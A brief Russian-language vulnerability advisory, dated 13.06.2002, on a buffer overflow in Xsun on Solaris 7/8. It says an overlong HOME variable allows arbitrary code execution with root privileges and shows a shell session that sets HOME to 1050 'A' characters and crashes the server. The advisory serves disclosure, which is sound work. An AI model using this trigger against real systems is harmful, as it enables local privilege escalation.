Переполнение буфера в Xsun

Свойства

Дата публикации:
13.06.2002

Код

Xsun - сервер X window для Sun систем. Переполнение буфера обнаружено в обработке переменной HOME, позволяющее выполнять произвольный код с root привилегиями. 

Уязвимость обнаружена в Solaris 7/8 (x86 and Sparc)

Пример:

bash-2.03$ HOME=`perl -e 'print "A"x1050'`
bash-2.03$ /usr/openwin/bin/Xsun :1
Warning: There is no XDISPLAY information for display 1.
Server is using XDISPLAY information for display 0.
Default Font Path: /usr/openwin/lib/X11/
Segmentation Fault (core dumped)

или введите имя

CAPTCHA